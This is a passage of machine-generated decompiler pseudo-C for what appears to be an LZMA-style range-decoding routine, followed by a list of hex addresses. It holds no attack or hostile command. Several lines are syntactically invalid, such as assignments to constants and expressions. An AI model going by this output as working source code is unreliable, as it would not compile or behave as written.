												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                  0x00000000
                                                  0x004066f0
                                                  0x004066f0
                                                  0x004066f4
                                                  0x00406701
                                                  0x0040670b
                                                  0x00000000
                                                  0x004066f6
                                                  0x004066f6
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406744
                                                  0x00406749
                                                  0x0040662a
                                                  0x0040662d
                                                  0x0040699f
                                                  0x0040699f
                                                  0x0040699f
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a2
                                                  0x004069a8
                                                  0x004069ae
                                                  0x004069b4
                                                  0x004069ce
                                                  0x004069d1
                                                  0x004069d7
                                                  0x004069e2
                                                  0x004069e4
                                                  0x004069b6
                                                  0x004069b6
                                                  0x004069c5
                                                  0x004069c9
                                                  0x004069c9
                                                  0x004069ee
                                                  0x00000000
                                                  0x00000000
                                                  0x004069f0
                                                  0x004069f4
                                                  0x00406ba3
                                                  0x00406bb9
                                                  0x00406bc1
                                                  0x00406bc8
                                                  0x00406bca
                                                  0x00406bd1
                                                  0x00406bd5
                                                  0x00406bd5
                                                  0x00406a00
                                                  0x00406a07
                                                  0x00406a0f
                                                  0x00406a12
                                                  0x00406a15
                                                  0x00406a15
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061b7
                                                  0x004061c0
                                                  0x00000000
                                                  0x00000000
                                                  0x004061c6
                                                  0x00000000
                                                  0x004061d1
                                                  0x00000000
                                                  0x00000000
                                                  0x004061da
                                                  0x004061dd
                                                  0x004061e0
                                                  0x004061e4
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ea
                                                  0x004061ed
                                                  0x004061ef
                                                  0x004061f0
                                                  0x004061f3
                                                  0x004061f5
                                                  0x004061f6
                                                  0x004061f8
                                                  0x004061fb
                                                  0x00406200
                                                  0x00406205
                                                  0x0040620e
                                                  0x00406221
                                                  0x00406224
                                                  0x00406230
                                                  0x00406258
                                                  0x0040625a
                                                  0x00406268
                                                  0x00406268
                                                  0x0040626c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040625c
                                                  0x0040625c
                                                  0x0040625f
                                                  0x00406260
                                                  0x00406260
                                                  0x00000000
                                                  0x0040625c
                                                  0x00406236
                                                  0x0040623b
                                                  0x0040623b
                                                  0x00406244
                                                  0x0040624c
                                                  0x0040624f
                                                  0x00000000
                                                  0x00406255
                                                  0x00406255
                                                  0x00000000
                                                  0x00406255
                                                  0x00000000
                                                  0x00406272
                                                  0x00406272
                                                  0x00406276
                                                  0x00406b22
                                                  0x00000000
                                                  0x00406b22
                                                  0x0040627f
